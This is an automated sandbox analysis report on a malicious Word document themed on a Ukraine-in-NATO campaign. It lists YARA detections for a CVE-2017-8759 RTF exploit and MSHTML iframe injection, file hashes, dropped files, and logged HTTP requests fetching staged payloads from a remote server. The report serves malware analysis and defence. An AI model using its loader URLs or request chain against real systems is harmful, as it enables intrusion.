Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc

Overview

General Information

Sample Name:Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Analysis ID:1266120
MD5:d227874863036b8e73a3894a19bd25a0
SHA1:2400b169ee2c38ac146c67408debc9b4fa4fca5f
SHA256:a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f
Tags:74-50-94-156docdocxHUN
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected iframe remote loader
Malicious sample detected (through community Yara rule)
Yara detected RTF with hardcoded OLE link
Yara detected RTF with MSHTML iframe injection
Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)
Microsoft Office drops suspicious files
Opens network shares
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Potential document exploit detected (performs HTTP gets)
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2008 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
afchunk.rtfJoeSecurity_RTFWithhardcodedUrlOLElinkYara detected RTF with hardcoded OLE linkJoe Security
    afchunk.rtfINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
    • 0xa018:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
    • 0x3eab:$ole2: D0CF11E0A1B11AE1
    • 0xa060:$ole2: d0cf11e0a1b11ae1
    • 0x26d6:$obj2: \objdata
    • 0x3e60:$obj2: \objdata
    • 0x2683:$obj3: \objupdate
    • 0x2678:$obj5: \objautlink
    • 0x3de2:$obj5: \objautlink
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.urlJoeSecurity_RTFMSHTMLIFRAMEYara detected RTF with MSHTML iframe injectionJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RFile[1].htmJoeSecurity_iframeloadingfromremoteserverYara detected iframe remote loaderJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.urlJoeSecurity_RTFMSHTMLIFRAMEYara detected RTF with MSHTML iframe injectionJoe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

          Software Vulnerabilities

          barindex
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RFile[1].htm, type: DROPPED
          Source: Yara matchFile source: afchunk.rtf, type: SAMPLE
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url, type: DROPPED
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficTCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/start.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/RFile.asp HTTP/1.1Accept: */*Referer: http://74.50.94.156/MSHTML_C7/start.xmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: unknownTCP traffic detected without corresponding DNS query: 74.50.94.156
          Source: ~WRS{E91871FC-BFD2-4C90-871A-4BA39F60B253}.tmp.0.drString found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xml
          Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.drString found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xmlyX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7C2C44C-1140-4E43-A415-F39DE2B8E989}.tmpJump to behavior
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/start.xml HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/RFile.asp HTTP/1.1Accept: */*Referer: http://74.50.94.156/MSHTML_C7/start.xmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL
          Source: global trafficHTTP traffic detected: GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL

          System Summary

          barindex
          Source: afchunk.rtf, type: SAMPLEMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.urlJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.urlJump to behavior
          Source: afchunk.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.
          Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
          Source: F2940191.url.0.drOLE indicator, Word Document stream: true
          Source: file001.url.0.drOLE indicator, Word Document stream: true
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$erview_of_UWCs_UkraineInNATO_campaign.docx.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRAB9.tmpJump to behavior
          Source: classification engineClassification label: mal84.spyw.expl.evad.winDOC@1/34@0/1
          Source: F2940191.url.0.drOLE document summary: title field not present or empty
          Source: F2940191.url.0.drOLE document summary: edited time not present or 0
          Source: file001.url.0.drOLE document summary: title field not present or empty
          Source: file001.url.0.drOLE document summary: edited time not present or 0
          Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: F2940191.url.0.drInitial sample: OLE indicators vbamacros = False
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
